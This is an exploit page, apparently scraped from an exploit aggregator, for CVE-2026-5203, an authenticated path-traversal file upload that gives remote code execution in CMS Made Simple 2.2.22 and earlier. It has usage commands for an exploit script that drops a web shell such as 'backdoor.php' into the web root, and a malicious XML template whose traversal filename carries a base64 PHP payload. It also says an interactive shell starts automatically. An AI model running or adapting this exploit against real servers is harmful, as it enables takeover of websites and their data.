Share
## https://sploitus.com/exploit?id=8374CFD7-CB1D-5D01-A3A7-BCE355F92621
# CVE-2026-5203 โ€” CMS Made Simple โ‰ค 2.2.22 RCE (Path Traversal + Arbitrary File Upload)

![CVSS](https://img.shields.io/badge/CVSS-7.2%20HIGH-red) ![Version](https://img.shields.io/badge/Affected-โ‰ค%202.2.22-orange) ![Type](https://img.shields.io/badge/Type-RCE-critical)

## Summary

The `UserGuide` module's XML import functionality in **CMS Made Simple โ‰ค 2.2.22** fails to sanitize user-supplied filenames, allowing an authenticated administrator to upload arbitrary files (e.g. PHP web shells) anywhere on the server filesystem via path traversal sequences.

| Field              | Value                                             |
|--------------------|---------------------------------------------------|
| **Type**           | Path Traversal / Arbitrary File Upload โ†’ RCE      |
| **Component**      | `UserGuide` Module โ€” XML Import                   |
| **Affected File**  | `modules/UserGuide/lib/class.UserGuideImporterExporter.php` |
| **CVSS v3.1**      | `7.2 HIGH` โ€” `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H` |
| **Auth Required**  | Yes (Administrator)                               |

---

## Vulnerable Code

```php
// modules/UserGuide/lib/class.UserGuideImporterExporter.php (~L250-280)
$filename = (string) $xmlFile->filename;
$isdir    = (string) $xmlFile->isdir;   
```

The function writes Base64-decoded content directly to the attacker-controlled path.

---

## Usage

```bash
python exploit.py     [upload_path]
```

**Examples:**
```bash
# Default path
python exploit.py http://target.com http://target.com/admin admin password123

# Custom upload path
python exploit.py http://target.com http://target.com/admin admin password123 \
  ../../../../../../var/www/html/backdoor.php
```

Interactive shell starts automatically if the web shell is reachable after upload.

---

## Malicious XML Structure

```xml


  UserGuide
  1.3
  
    
      ../../../webshell.php
      0
      [BASE64_ENCODED_PHP_CODE]
    
  

```

---